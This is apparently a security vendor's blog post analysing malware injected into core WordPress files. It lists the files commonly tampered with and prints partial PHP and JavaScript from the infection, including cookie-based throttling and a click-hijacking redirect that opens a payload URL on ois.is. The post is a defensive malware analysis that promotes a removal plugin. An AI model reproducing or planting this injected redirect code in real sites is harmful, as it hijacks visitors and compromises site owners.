We will introduce an example of a type of malware in which an image file of ois.is is illegally embedded, which has been increasing greatly in recent years.


Malware that loads malware disguised as images from ois.is and executes it on WordPress sites

This malware exploits a vulnerability and embeds malicious code in key WordPress files by taking away WordPress administrator privileges.

Since the malware infects WordPress by embedding code in the form of additions to the main WordPress files, only the tampered parts must be carefully removed, since deleting the file itself will cause the site to malfunction.

↓The most commonly tampered with files are as follows
wp-settings.php
wp-comments-post.php
xmlrpc.php
wp-trackback.php
wp-blog-header.php
wp-signup.php
wp-cron.php
wp-links-opml.php

Malware Code

Let’s take a look at the malware code. The tampered part of this malware is shown below.

error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);

$ckUjYggTf = 0;
   foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){
      1(omitted)
      break;
   }
}
}
function globalClick(event) {
const host = location.host
const newLocation = \"https://ois.is/images/logo.png\"
2(omitted)
const hoursDiff = getHoursDiff(nowDate, storageDate)
console.log(nowDate, storageDate, hoursDiff)
if (hoursDiff >= allowedHours) {
addToStorage(host, nowDate);
window.open(newLocation, \"_blank\");
}
3(omitted)
window.open(newLocation, \"_blank\"); }
}
}
document.addEventListener(\"clickClick", globalClick); }
})();"; }
}

The ini_set portion of the code does not output any errors or warnings.

In the part 1, the time is recorded in the user’s COOKIE to ensure that malware is only executed on rare occasions, thus delaying the detection of malware infection.

In part 2, the malicious code of the malware itself, disguised as an image, is retrieved from an external server called ois.is. This includes a list of malicious URLs, called a redirect hack, that force users to visit a different site when they visit it.

In part 3, the code is executed and also hijacks the clicks on the site so that the redirect hack is manifested when the user clicks on any link.

This malware can be detected and removed with the following plugin. Please try it.
Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

Related Posts:

  1. 10 files in which malformed JAVASCRIPT code is embedded when WordPress is tampered with.
    This section describes a file in which redirect hack code is often embedded, which causes a WordPress-created site to jump to another site when accessed (redirect)....
  2. 5 characteristics of malware files that infect WordPress
    Here are some characteristics of malware files that can infect WordPress. If such a file is found on the server, it is most likely malware....
  3. A case of malware embedding where WordPress sends you to another site without your permission for robot verification.
    There has been a recent increase in cases of redirect hacks where WordPress sites are redirected to another site for robot verification without permission. Here are some examples of this malware embedding and how to deal with it....
  4. What is a WordPress injection attack?
    There are various methods by which WordPress can be hacked, the most common of which is called an injection attack. This section describes these injection attacks....
  5. WordPress, dealing with spam indexing, where pages you don’t remember creating get caught in search results.
    We will explain how to deal with spam indexing, a common symptom of recent WordPress tampering, in which pages that you do not remember creating are caught in the search results....
  6. If WordPress may be infected with malware (virus or tampering), use the plugin for quick malware inspection and removal.
    When WordPress may be infected with malware (virus or tampering), you can easily use a plugin to inspect and remove malware. The following is a list of the main types of malware behavior on websites and malware scanning and disinfection plug-ins....